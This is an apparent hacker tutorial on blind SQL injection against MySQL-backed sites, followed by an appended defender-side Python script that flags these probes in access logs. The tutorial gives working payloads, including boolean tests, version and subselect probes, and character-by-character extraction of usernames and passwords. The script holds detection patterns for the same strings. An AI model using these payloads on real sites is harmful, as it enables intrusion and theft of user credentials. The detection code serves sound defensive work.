blind sql injection

c0rrupter

-----ABOUT BLIND SQL INJECTION------
BLIND SQL INJECTION

We have already posted about error based sql injection. Let us
discuss the harder part, i.e. blind sql injection.
Let our example be:

Let's test it:
and 1=1 <--- this is always true and the
page loads normally, that's ok.
and 1=2 <--- this is false, so if some
text, picture or other content is missing on the returned page then that site is
vulnerable to blind sql injection.

GETTING MySQL VERSION

To get the MySQL version in a blind attack we use substring:
and substring(@@version,1,1)=4
This should return TRUE if the version of MySQL is 4. Replace 4 with 5,
and if the query returns TRUE then the version is 5.

CHECKING FOR SUBSELECT

When select doesn't work then we use subselect:
and (select 1)=1
If the page loads normally then subselect works; then we are going to see if we
have access to mysql.user:
and (select 1 from mysql.user limit 0,1)=1
If the page loads normally we have access to mysql.user, and then later we can
pull some passwords using the load_file() function and OUTFILE.

CHECKING FOR TABLE AND COLUMN NAME
Here luck and guessing work more than anything.
and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, because a subselect returns
only 1 row; this is very important.)
Then if the page loads normally without content missing, the table users
exists. If you get FALSE (some article missing), just change the table name until
you guess the right one.
Let's say that we have found that the table name is users; now what we need is
the column name. The same as with the table name, we start guessing. Like I said before,
try the common names for columns:
and (select substring(concat(1,password),1,1) from users limit 0,1)=1
If the page loads normally we know that the column name is password
(if we get false then try common names or just guess). Here we merge 1 with the
column password, then substring returns the first character (1,1).

PULL DATA FROM DATABASE
We found table users, columns username and password, so we're gonna pull
characters from that. Like:
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
OK, this here pulls the first character from the first user in table users. Substring
here returns the first character, 1 character in length. ascii() converts that 1
character into its ascii value and then compares it with the greater-than symbol >. So
if the ascii char is greater than 80, the page loads normally (TRUE). We keep
trying until we get false.
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
We get TRUE, keep incrementing.
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher.
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
So the first character in username is char(99). Using the ascii converter we
know that char(99) is the letter 'c'.
So keep incrementing until you get to the end.
But trying to find a stable webpage is the tough job.
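As an added example that is not part of the original post, here is a defender-side Python script that scans web-server access log lines for the probe shapes described above (and 1=1 / 1=2, substring(@@version), the (select 1) subselect, and the incrementing ascii(substring(...))>N comparisons) and flags any source address that is walking a column character by character. The log lines, IP addresses and paths are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access log (not from the post); only 10.0.0.9 sends the probes.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 4123
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=5+and+1%3D1 HTTP/1.1" 200 4123
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?id=5+and+1%3D2 HTTP/1.1" 200 3980
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /news.php?id=5+and+substring(%40%40version%2C1%2C1)%3D5 HTTP/1.1" 200 4123
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=5+and+(select+1)%3D1 HTTP/1.1" 200 4123
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /news.php?id=5+and+ascii(substring((SELECT+concat(username%2C0x3a%2Cpassword)+from+users+limit+0%2C1)%2C1%2C1))%3E80 HTTP/1.1" 200 4123
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /news.php?id=5+and+ascii(substring((SELECT+concat(username%2C0x3a%2Cpassword)+from+users+limit+0%2C1)%2C1%2C1))%3E95 HTTP/1.1" 200 4123
10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /news.php?id=5+and+ascii(substring((SELECT+concat(username%2C0x3a%2Cpassword)+from+users+limit+0%2C1)%2C1%2C1))%3E99 HTTP/1.1" 200 3980
10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?q=blind+sql+injection HTTP/1.1" 200 2210
"""

# Common-log-format line: ip, identd, user, [time], "METHOD path PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+) (?P<size>\d+)'
)

# Each pattern is matched against the URL-decoded query string, case-insensitively.
PROBES = {
    "boolean_tautology": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "version_probe": re.compile(r"substring\s*\(\s*@@version", re.I),
    "subselect_probe": re.compile(r"\(\s*select\s+1\b", re.I),
    "char_extraction": re.compile(r"ascii\s*\(\s*substring\s*\(.*?\)\s*[<>=]\s*\d+", re.I),
}

def scan_log(text):
    """Return {ip: {probe_name: count}} for requests whose decoded query matches a probe."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or "?" not in m.group("path"):
            continue
        query = unquote_plus(m.group("path").split("?", 1)[1])
        for name, pat in PROBES.items():
            if pat.search(query):
                hits[m.group("ip")][name] += 1
    return {ip: dict(c) for ip, c in hits.items()}

def extraction_sources(hits, threshold=3):
    """IPs that sent >= threshold ascii(substring(...)) comparisons: the char-by-char loop."""
    return sorted(ip for ip, c in hits.items() if c.get("char_extraction", 0) >= threshold)

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    print(found)
    print("extraction sources:", extraction_sources(found))
```

A single tautology hit can be a false positive, so the character-extraction counter is the signal worth alerting on: a legitimate client never sends a run of ascii(substring(...)) comparisons against one parameter.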